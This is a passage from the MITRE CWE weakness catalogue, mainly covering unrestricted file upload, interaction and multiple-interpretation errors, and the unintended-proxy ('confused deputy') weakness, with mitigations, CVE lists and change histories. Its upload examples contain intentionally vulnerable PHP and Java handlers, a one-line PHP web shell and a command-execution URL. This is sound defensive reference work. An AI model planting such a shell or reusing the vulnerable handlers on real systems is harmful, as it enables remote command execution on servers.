as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. + + + Architecture and Design + Consider storing the uploaded files outside of the web document root entirely. Then, use other mechanisms to deliver the files dynamically. [REF-423] + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + For example, limiting filenames to alphanumeric characters can help to restrict the introduction of unintended file extensions. + + + + Architecture and Design + Define a very limited set of allowable extensions and only generate filenames that end in these extensions. Consider the possibility of XSS (CWE-79) before allowing .html or .htm file types. + + + Implementation + Input Validation + Ensure that only one extension is used in the filename. Some web servers, including some versions of Apache, may process files based on inner extensions so that "filename.php.gif" is fed to the PHP interpreter.[REF-422] [REF-423] + + + Implementation + When running on a web server that supports case-insensitive filenames, perform case-insensitive evaluations of the extensions that are provided. + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + Do not rely exclusively on sanity checks of file contents to ensure that the file is of the expected type and size. It may be possible for an attacker to hide code in some file segments that will still be executed by the server. For example, GIF images may contain a free-form comments field. + + + Implementation + Do not rely exclusively on the MIME content type or filename attribute when determining how to render a file. Validating the MIME content type and ensuring that it matches the extension is only a partial solution. + + + Architecture and Design + Operation + Environment Hardening + Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. + + + Architecture and Design + Operation + Sandbox or Jail + + Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. + OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. + This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. + Be careful to avoid CWE-243 and other weaknesses related to jails. + + Limited + The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. + + + + + The following code intends to allow a user to upload a picture to the web server. The HTML code that drives the form on the user end has an input field of type "file". + + <form action="upload_picture.php" method="post" enctype="multipart/form-data"> + Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> + </form> + + Once submitted, the form above sends the file to upload_picture.php on the web server. PHP stores the file in a temporary location until it is retrieved (or discarded) by the server side code. In this example, the file is moved to a more permanent pictures/ directory. + + + + // Define the target location where the picture being + + + // uploaded is going to be saved. + $target = "pictures/" . basename($_FILES['uploadedfile']['name']); + + // Move the uploaded file to the new location. + if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target)){echo "The picture has been successfully uploaded.";}else{echo "There was an error uploading the picture, please try again.";} + + The problem with the above code is that there is no check regarding type of file being uploaded. Assuming that pictures/ is available in the web document root, an attacker could upload a file with the name: + + malicious.php + + Since this filename ends in ".php" it can be executed by the web server. In the contents of this uploaded file, the attacker could use: + + <?phpsystem($_GET['cmd']); + ?> + + Once this file has been installed, the attacker can enter arbitrary commands to execute using a URL such as: + + http://server.example.com/upload_dir/malicious.php?cmd=ls%20-l + + which runs the "ls -l" command - or any other type of command that the attacker wants to specify. + + + The following code demonstrates the unrestricted upload of a file with a Java servlet and a path traversal vulnerability. The action attribute of an HTML form is sending the upload file request to the Java servlet. + + <form action="FileUploadServlet" method="post" enctype="multipart/form-data"> + Choose a file to upload:<input type="file" name="filename"/><br/><input type="submit" name="submit" value="Submit"/> + </form> + + When submitted the Java servlet's doPost method will receive the request, extract the name of the file from the Http request header, read the file contents from the request and output the file to the local upload directory. + + public class FileUploadServlet extends HttpServlet { + + ... + protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { + + response.setContentType("text/html");PrintWriter out = response.getWriter();String contentType = request.getContentType(); + // the starting position of the boundary headerint ind = contentType.indexOf("boundary=");String boundary = contentType.substring(ind+9); + String pLine = new String();String uploadLocation = new String(UPLOAD_DIRECTORY_STRING); //Constant value + // verify that content type is multipart form dataif (contentType != null && contentType.indexOf("multipart/form-data") != -1) { + + // extract the filename from the Http headerBufferedReader br = new BufferedReader(new InputStreamReader(request.getInputStream()));...pLine = br.readLine();String filename = pLine.substring(pLine.lastIndexOf("\\"), pLine.lastIndexOf("\""));... + // output the file to the local upload directorytry { + BufferedWriter bw = new BufferedWriter(new FileWriter(uploadLocation+filename, true));for (String line; (line=br.readLine())!=null; ) {if (line.indexOf(boundary) == -1) {bw.write(line);bw.newLine();bw.flush();}} //end of for loopbw.close(); + + + } catch (IOException ex) {...}// output successful upload response HTML page + }// output unsuccessful upload response HTML pageelse{...} + }... + + } + + This code does not perform a check on the type of the file being uploaded (CWE-434). This could allow an attacker to upload any executable file or other file with malicious code. + Additionally, the creation of the BufferedWriter object is subject to relative path traversal (CWE-23). Since the code does not check the filename that is provided in the header, an attacker can use "../" sequences to write to files outside of the intended directory. Depending on the executing environment, the attacker may be able to specify arbitrary files to write to, leading to a wide variety of consequences, from code execution, XSS (CWE-79), or system crash. + + + + + CVE-2001-0901 + Web-based mail product stores ".shtml" attachments that could contain SSI + https://www.cve.org/CVERecord?id=CVE-2001-0901 + + + CVE-2002-1841 + PHP upload does not restrict file types + https://www.cve.org/CVERecord?id=CVE-2002-1841 + + + CVE-2005-1868 + upload and execution of .php file + https://www.cve.org/CVERecord?id=CVE-2005-1868 + + + CVE-2005-1881 + upload file with dangerous extension + https://www.cve.org/CVERecord?id=CVE-2005-1881 + + + CVE-2005-0254 + program does not restrict file types + https://www.cve.org/CVERecord?id=CVE-2005-0254 + + + CVE-2004-2262 + improper type checking of uploaded files + https://www.cve.org/CVERecord?id=CVE-2004-2262 + + + CVE-2006-4558 + Double "php" extension leaves an active php extension in the generated filename. + https://www.cve.org/CVERecord?id=CVE-2006-4558 + + + CVE-2006-6994 + ASP program allows upload of .asp files by bypassing client-side checks + https://www.cve.org/CVERecord?id=CVE-2006-6994 + + + CVE-2005-3288 + ASP file upload + https://www.cve.org/CVERecord?id=CVE-2005-3288 + + + CVE-2006-2428 + ASP file upload + https://www.cve.org/CVERecord?id=CVE-2006-2428 + + + + File Processing + + + File or Directory + + + + Unrestricted File Upload + + + A3 + Malicious File Execution + CWE More Specific + + + ASCSM-CWE-434 + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This can have a chaining relationship with incomplete denylist / permissive allowlist errors when the product tries, but fails, to properly limit which types of files are allowed (CWE-183, CWE-184). + This can also overlap multiple interpretation errors for intermediaries, e.g. anti-virus products that do not remove or quarantine attachments with certain file extensions that can be processed by client systems. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms, Functional_Areas, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + Critical + converted from Compound_Element to Weakness + + + CWE Content Team + MITRE + 2010-02-16 + updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationship_Notes, Relationships, Type, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated References, Relationship_Notes + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Potential_Mitigations + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations, Relationship_Notes + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Alternate_Terms, Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Unrestricted File Upload + + + + An interaction error occurs when two entities have correct behavior when running independently of each other, but when they are integrated as components in a larger system or process, they introduce incorrect behaviors that may cause resultant weaknesses. + When a system or process combines multiple independent components, this often produces new, emergent behaviors at the system level. However, if the interactions between these components are not fully accounted for, some of the emergent behaviors can be incorrect or even insecure. + + + + + + + Interaction Error + + + Emergent Fault + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Integrity + Unexpected State + Varies by Context + + + + + Interaction Errors + + + + + + + Discouraged + This CWE entry is extremely high-level, a Pillar. However, sometimes this weakness is forced to be used due to the lack of in-depth weakness research. See Research Gaps. + Where feasible, consider children or descendants of this entry instead. + + + + + + + Weaknesses related to this Pillar appear to be under-studied, especially with respect to classification schemes. Input from academic and other communities could help identify and resolve gaps or organizational difficulties within CWE. + + The "Interaction Error" term, in CWE and elsewhere, is only intended to describe products that behave according to specification. When one or more of the products do not comply with specifications, then it is more likely to be API Abuse (CWE-227) or an interpretation conflict (CWE-436). This distinction can be blurred in real world scenarios, especially when "de facto" standards do not comply with specifications, or when there are no standards but there is widespread adoption. As a result, it can be difficult to distinguish these weaknesses during mapping and classification. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Relationships + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Name, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Alternate_Terms, Description, Name, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Type + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Research_Gaps + + Interaction Errors + Interaction Error + Improper Interaction Between Multiple Entities + + + + Product A handles inputs or steps differently than Product B, which causes A to perform incorrect actions based on its perception of B's state. + This is generally found in proxies, firewalls, anti-virus software, and other intermediary devices that monitor, allow, deny, or modify traffic based on how the client or server is expected to behave. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Other + Unexpected State + Varies by Context + + + + + The paper "Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection" [REF-428] shows that OSes varied widely in how they manage unusual packets, which made it difficult or impossible for intrusion detection systems to properly detect certain attacker manipulations that took advantage of these OS differences. + + + Null characters have different interpretations in Perl and C, which have security consequences when Perl invokes C functions. Similar problems have been reported in ASP [REF-429] and PHP. + + + + + CVE-2005-1215 + Bypass filters or poison web cache using requests with multiple Content-Length headers, a non-standard behavior. + https://www.cve.org/CVERecord?id=CVE-2005-1215 + + + CVE-2002-0485 + Anti-virus product allows bypass via Content-Type and Content-Disposition headers that are mixed case, which are still processed by some clients. + https://www.cve.org/CVERecord?id=CVE-2002-0485 + + + CVE-2002-1978 + FTP clients sending a command with "PASV" in the argument can cause firewalls to misinterpret the server's error as a valid response, allowing filter bypass. + https://www.cve.org/CVERecord?id=CVE-2002-1978 + + + CVE-2002-1979 + FTP clients sending a command with "PASV" in the argument can cause firewalls to misinterpret the server's error as a valid response, allowing filter bypass. + https://www.cve.org/CVERecord?id=CVE-2002-1979 + + + CVE-2002-0637 + Virus product bypass with spaces between MIME header fields and the ":" separator, a non-standard message that is accepted by some clients. + https://www.cve.org/CVERecord?id=CVE-2002-0637 + + + CVE-2002-1777 + AV product detection bypass using inconsistency manipulation (file extension in MIME Content-Type vs. Content-Disposition field). + https://www.cve.org/CVERecord?id=CVE-2002-1777 + + + CVE-2005-3310 + CMS system allows uploads of files with GIF/JPG extensions, but if they contain HTML, Internet Explorer renders them as HTML instead of images. + https://www.cve.org/CVERecord?id=CVE-2005-3310 + + + CVE-2005-4260 + Interpretation conflict allows XSS via invalid "<" when a ">" is expected, which is treated as ">" by many web browsers. + https://www.cve.org/CVERecord?id=CVE-2005-4260 + + + CVE-2005-4080 + Interpretation conflict (non-standard behavior) enables XSS because browser ignores invalid characters in the middle of tags. + https://www.cve.org/CVERecord?id=CVE-2005-4080 + + + + + Multiple Interpretation Error (MIE) + + + 27 + HTTP Response Smuggling + + + + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Description, Observed_Examples, Other_Notes, References + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Demonstrative_Examples, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Multiple Interpretation Error (MIE) + + + + A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint's features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model. + + + + + + + + + Architecture and Design + + + Implementation + + + + + Integrity + Other + Unexpected State + Varies by Context + + + + + HTTP request smuggling is an attack against an intermediary such as a proxy. This attack works because the proxy expects the client to parse HTTP headers one way, but the client parses them differently. + + + Anti-virus products that reside on mail servers can suffer from this issue if they do not know how a mail client will handle a particular attachment. The product might treat an attachment type as safe, not knowing that the client's configuration treats it as executable. + + + + + Extra Unhandled Features + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This can be related to interaction errors, although in some cases, one of the endpoints is not performing correctly according to specification. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2010-12-13 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Extra Unhandled Features + + + + A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B. + + + + + + + + + Functional change + + + + + Architecture and Design + + + Implementation + + + + + Other + Quality Degradation + Varies by Context + + + + + CVE-2002-1976 + Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property). + https://www.cve.org/CVERecord?id=CVE-2002-1976 + + + CVE-2005-1711 + Product uses defunct method from another product that does not return an error code and allows detection avoidance. + https://www.cve.org/CVERecord?id=CVE-2005-1711 + + + CVE-2003-0411 + chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where filetype handlers treat .jsp and .JSP as different extensions. JSP source code may be read because .JSP defaults to the filetype "text". + https://www.cve.org/CVERecord?id=CVE-2003-0411 + + + + + CHANGE Behavioral Change + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Observed_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Behavioral Change + + + + The product accepts path input in the form of internal dot ('file.ordir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files. + + + + + + + + + Implementation + + + + + Confidentiality + Integrity + Read Files or Directories + Modify Files or Directories + + + + + Internal Dot - 'file.ordir' + + + SFP16 + Path Traversal + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + An improper attempt to remove the internal dots from the string could lead to CWE-181 (Incorrect Behavior Order: Validate Before Filter). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Internal Dot - 'file.ordir' + + + + A feature, API, or function does not perform according to its specification. + + + + + + + + + + Architecture and Design + + + Implementation + + + Operation + + + + + Other + Quality Degradation + Varies by Context + + + + + CVE-2003-0187 + Program uses large timeouts on "undeserving" to compensate for inconsistency of support for linked lists. + https://www.cve.org/CVERecord?id=CVE-2003-0187 + + + CVE-2003-0465 + "strncpy" in Linux kernel acts different than libc on x86, leading to expected behavior difference - sort of a multiple interpretation error? + https://www.cve.org/CVERecord?id=CVE-2003-0465 + + + CVE-2005-3265 + Buffer overflow in product stems the use of a third party library function that is expected to have internal protection against overflows, but doesn't. + https://www.cve.org/CVERecord?id=CVE-2005-3265 + + + + + Expected behavior violation + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The behavior of an application that is not consistent with the expectations of the developer may lead to incorrect use of the software. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Other_Notes, Relevant_Properties, Theoretical_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relevant_Properties + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Description, Observed_Examples, Theoretical_Notes + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product receives a request, message, or directive from an upstream component, but the product does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the product's control sphere. This causes the product to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor. + + If an attacker cannot directly contact a target, but the product has access to the target, then the attacker can send a request to the product and have it be forwarded to the target. The request would appear to be coming from the product's system, not the attacker's system. As a result, the attacker can bypass access controls (such as firewalls) or hide the source of malicious requests, since the requests would not be coming directly from the attacker. + Since proxy functionality and message-forwarding often serve a legitimate purpose, this issue only becomes a vulnerability when: + + The product runs with different privileges or on a different system, or otherwise has different levels of access than the upstream component; + The attacker is prevented from making the request directly to the target; and + The attacker can create a request that the proxy does not explicitly intend to be forwarded on the behalf of the requester. Such a request might point to an unexpected hostname, port number, hardware IP, or service. Or, the request might be sent to an allowed service, but the request could contain disallowed directives, commands, or resources. + + + + + + + + + + + + + + + Confused Deputy + This weakness is sometimes referred to as the "Confused deputy" problem, in which an attacker misused the authority of one victim (the "confused deputy") when targeting another victim. + + + + + Architecture and Design + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + + + Non-Repudiation + Access Control + Gain Privileges or Assume Identity + Hide Activities + Execute Unauthorized Code or Commands + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Enforce the use of strong mutual authentication mechanism between the two parties. + + + Architecture and Design + Whenever a product is an intermediary or proxy for + transactions between two other components, the proxy core + should not drop the identity of the initiator of the + transaction. The immutability of the identity of the + initiator must be maintained and should be forwarded all the + way to the target. + + + + + + A SoC contains a microcontroller (running ring-3 + (least trusted ring) code), a Memory Mapped Input Output + (MMIO) mapped IP core (containing design-house secrets), + and a Direct Memory Access (DMA) controller, among several + other compute elements and peripherals. The SoC implements + access control to protect the registers in the IP core + (which registers store the design-house secrets) from + malicious, ring-3 (least trusted ring) code executing on + the microcontroller. The DMA controller, however, is not + blocked off from accessing the IP core for functional + reasons. + + + The code in ring-3 (least trusted ring) of the + microcontroller attempts to directly read the protected + registers in IP core through MMIO transactions. However, + this attempt is blocked due to the implemented access + control. Now, the microcontroller configures the DMA core + to transfer data from the protected registers to a memory + region that it has access to. The DMA core, which is + acting as an intermediary in this transaction, does not + preserve the identity of the microcontroller and, instead, + initiates a new transaction with its own identity. Since + the DMA core has access, the transaction (and hence, the + attack) is successful. + + The weakness here is that the intermediary or the + proxy agent did not ensure the immutability of the + identity of the microcontroller initiating the + transaction. + + The DMA + core forwards this transaction with the identity of the + code executing on the microcontroller, which is the + original initiator of the end-to-end transaction. Now the + transaction is blocked, as a result of forwarding the + identity of the true initiator which lacks the permission + to access the confidential MMIO mapped IP core. + + + + + + CVE-1999-0017 + FTP bounce attack. The design of the protocol allows an attacker to modify the PORT command to cause the FTP server to connect to other machines besides the attacker's. + https://www.cve.org/CVERecord?id=CVE-1999-0017 + + + CVE-1999-0168 + RPC portmapper could redirect service requests from an attacker to another entity, which thinks the requests came from the portmapper. + https://www.cve.org/CVERecord?id=CVE-1999-0168 + + + CVE-2005-0315 + FTP server does not ensure that the IP address in a PORT command is the same as the FTP user's session, allowing port scanning by proxy. + https://www.cve.org/CVERecord?id=CVE-2005-0315 + + + CVE-2002-1484 + Web server allows attackers to request a URL from another server, including other ports, which allows proxied scanning. + https://www.cve.org/CVERecord?id=CVE-2002-1484 + + + CVE-2004-2061 + CGI script accepts and retrieves incoming URLs. + https://www.cve.org/CVERecord?id=CVE-2004-2061 + + + CVE-2001-1484 + Bounce attack allows access to TFTP from trusted side. + https://www.cve.org/CVERecord?id=CVE-2001-1484 + + + CVE-2010-1637 + Web-based mail program allows internal network scanning using a modified POP3 port number. + https://www.cve.org/CVERecord?id=CVE-2010-1637 + + + CVE-2009-0037 + URL-downloading library automatically follows redirects to file:// and scp:// URLs + https://www.cve.org/CVERecord?id=CVE-2009-0037 + + + + + Unintended proxy/intermediary + + + Proxied Trusted Channel + + + 32 + Routing Detour + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + This weakness has a chaining relationship with CWE-668 (Exposure of Resource to Wrong Sphere) because the proxy effectively provides the attacker with access to the target's resources that the attacker cannot directly obtain. + This could possibly be considered as an emergent resource. + It could be argued that the "confused deputy" is a fundamental aspect of most vulnerabilities that require an active attacker. Even for common implementation issues such as buffer overflows, SQL injection, OS command injection, and path traversal, the vulnerable program already has the authorization to run code or access files. The vulnerability arises when the attacker causes the program to run unexpected code or access unexpected files. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + 